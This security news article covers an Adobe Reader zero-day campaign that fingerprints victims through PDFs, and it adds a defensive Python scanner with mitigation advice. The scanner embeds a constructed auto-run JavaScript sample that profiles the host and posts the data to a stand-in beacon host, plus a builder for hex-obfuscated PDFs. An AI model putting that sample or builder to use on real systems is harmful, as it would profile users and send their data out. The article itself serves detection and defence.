Months-old Adobe Reader zero-day uses PDFs to size up targets

April 9, 2026
Photo by Meri Verbina on Pexels

According to a report in The Register, attackers have been quietly exploiting what appears to be a zero-day in Adobe Acrobat Reader for months, weaponising seemingly ordinary PDFs to profile victims before deciding whether to fully compromise them. Security researcher Haifei Li, founder of the sandbox-based detector EXPMON, says the malicious documents run their code as soon as they are opened, with no extra clicks needed, and work against fully up-to-date Reader installs. Sneaky? Absolutely.

How the PDF works

The exploit reportedly uses heavily obfuscated JavaScript that runs as soon as the file is opened and calls legitimate Acrobat JavaScript APIs to pull system data: OS details, language settings and local file paths, which it then sends to attacker-controlled servers. That first pass appears to be pure reconnaissance. “Such a mechanism allows the threat actor to collect user information, steal local data, perform advanced 'fingerprinting', and launch future attacks,” Li warned. If the host checks out, a second-stage payload is fetched and executed inside Reader; researchers say that could lead to remote code execution or even a sandbox escape. Note the split: the profiling stage leans on Reader's own scripting features rather than on a memory-corruption bug, which is why a fully patched install does not stop it, while the flaw the second stage relies on has not been made public.
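As an added illustration (not code from the article, from EXPMON, or from Adobe), here is a small static triage script in Python that flags the traits the report describes: an action that fires on document open, a JavaScript action, calls to Acrobat APIs that read host details and send data out, and the name hex-escaping and stream compression that obfuscated samples use to hide those tokens from naive string searches. The PDF it scans is constructed inline; the API groupings, the obfuscation tokens and the risk thresholds are this example's own heuristics, not indicators published for the campaign.

```python
import re
import zlib
from typing import Optional

# Documented Acrobat JavaScript APIs. Grouping them as "fingerprint" and
# "beacon" indicators is this example's own heuristic, not a published IOC list.
FINGERPRINT_APIS = (b"app.platform", b"app.language", b"app.viewerVersion",
                    b"app.viewerType", b"this.path")
BEACON_APIS = (b"Net.HTTP", b"submitForm", b"app.launchURL", b"getURL")
JS_OBFUSCATION = (b"eval(", b"unescape(", b"String.fromCharCode")

STREAM_RE = re.compile(rb"\bstream\r?\n(.*?)\nendstream", re.S)
NAME_RE = re.compile(rb"/[^\s/<>\[\]()%]+")        # a PDF name token
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")  # #xx escape inside a name


def inflate_streams(data: bytes) -> bytes:
    """Replace every stream body that is a complete zlib stream with its plaintext.

    Runs before name decoding so compressed bytes are never mistaken for #xx
    escapes. A trailing CR before 'endstream' lands in unused_data and is ignored;
    anything that is not a complete zlib stream is left untouched.
    """
    def repl(m):
        d = zlib.decompressobj()
        try:
            plain = d.decompress(m.group(1))
        except zlib.error:
            return m.group(0)
        return b"stream\n" + plain + b"\nendstream" if d.eof else m.group(0)
    return STREAM_RE.sub(repl, data)


def decode_names(data: bytes) -> bytes:
    """Undo #xx escapes inside name tokens, so /Open#41ction reads /OpenAction."""
    def repl(m):
        return HEX_ESCAPE_RE.sub(lambda h: bytes([int(h.group(1), 16)]), m.group(0))
    return NAME_RE.sub(repl, data)


def risk_level(f: dict) -> str:
    """Example's own thresholds: auto-run JS that profiles and phones home is 'high'."""
    auto_js = f["javascript"] and (f["open_action"] or f["additional_actions"])
    if auto_js and f["fingerprint_apis"] and f["beacon_apis"]:
        return "high"
    if auto_js:
        return "medium"
    return "low" if f["javascript"] else "none"


def scan_pdf(data: bytes) -> dict:
    """Static triage of raw PDF bytes for auto-run, fingerprinting JavaScript."""
    inflated = inflate_streams(data)
    text = decode_names(inflated)
    f = {
        # Triggers: /OpenAction runs on open; /AA hooks page, field and document events.
        "open_action": re.search(rb"/OpenAction\b", text) is not None,
        "additional_actions": re.search(rb"/AA\b", text) is not None,
        "javascript": re.search(rb"/(JavaScript|JS)\b", text) is not None,
        "fingerprint_apis": sorted(a.decode() for a in FINGERPRINT_APIS if a in text),
        "beacon_apis": sorted(a.decode() for a in BEACON_APIS if a in text),
        # Obfuscation hints: escaped names in the object tree (checked before
        # decoding) and runtime-decoding idioms inside the script text.
        "obfuscated_names": re.search(rb"/[^\s/<>\[\]()%]*#[0-9A-Fa-f]{2}", inflated) is not None,
        "js_obfuscation": any(tok in text for tok in JS_OBFUSCATION),
    }
    f["risk"] = risk_level(f)
    return f


# Constructed script in the shape the article describes (profile the host, decode
# more code at runtime, post the result). It is scanner input only; it never runs.
SAMPLE_JS = (
    b"var fp = app.platform + '|' + app.language + '|' + app.viewerVersion + '|' + this.path;\n"
    b"eval(unescape('%76%61%72%20%73%3d%31'));\n"
    b"this.submitForm({cURL: 'http://example.invalid/beacon?fp=' + fp, cSubmitAs: 'HTML'});\n"
)


def build_sample_pdf(js: Optional[bytes] = None, obfuscate_names: bool = True) -> bytes:
    """Constructed sample: a one-page PDF, optionally with an OpenAction that runs
    `js` from a FlateDecode stream, with key names hex-escaped as obfuscated samples do."""
    open_action = b"/Open#41ction" if obfuscate_names else b"/OpenAction"
    js_name = b"/J#53" if obfuscate_names else b"/JS"
    objs = [b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
            b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>"]
    catalog = b"<< /Type /Catalog /Pages 2 0 R"
    if js is not None:
        packed = zlib.compress(js)
        objs.append(b"<< /S /JavaScript " + js_name + b" 5 0 R >>")
        objs.append(b"<< /Filter /FlateDecode /Length %d >>\nstream\n" % len(packed)
                    + packed + b"\nendstream")
        catalog += b" " + open_action + b" 4 0 R"
    objs.insert(0, catalog + b" >>")
    out, offsets = b"%PDF-1.7\n", []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref_at = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    out += b"".join(b"%010d 00000 n \n" % off for off in offsets)
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref_at)
    return out


if __name__ == "__main__":
    for label, doc in (("recon", build_sample_pdf(SAMPLE_JS)), ("plain", build_sample_pdf())):
        print(label, scan_pdf(doc))
```

String matching over inflated streams only catches lazy obfuscation: a script that assembles API names at runtime from String.fromCharCode, or pulls its stage-one logic through eval, will slip past it, which is why the researcher quoted above relies on sandbox detonation rather than signatures. Treat a scanner like this as a mail-gateway prefilter that decides what to detonate, not as a verdict.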

Targets, timeline and unanswered questions

Researcher Gi7w0rm is reported to have found lure documents tied to the campaign containing Russian-language content about oil and gas, a hint, not proof, that the attackers were aiming at a particular audience rather than casting a wide net. A related sample was uploaded to VirusTotal on November 28, 2025, so the operation has probably been running for months. Worryingly, there is still no CVE and no patch, and The Register reports that Adobe had not publicly responded to inquiries, leaving users exposed for the time being.

What to do now

So what can you do? Don't open PDFs from unknown senders. Use layered defenses: endpoint detection, strict email filters, and PDF viewers that restrict JavaScript. Because the reconnaissance stage runs as Acrobat JavaScript, switching that engine off is the most direct mitigation available today: in Reader it is the “Enable Acrobat JavaScript” checkbox under Edit > Preferences > JavaScript, and administrators can lock it off fleet-wide with the bDisableJavaScript setting under the FeatureLockDown policy key documented in Adobe's Enterprise Toolkit. Keeping Protected View enabled for all files adds a further barrier for any second stage, and Reader processes making unexpected outbound connections are worth alerting on, since the profiling data has to leave the machine somehow. Patch when Adobe finally issues one (and it will have to), because this is one of those “silent for months” stories that make security teams lose sleep. Who wants that? Not me. Not you.

Sources: The Register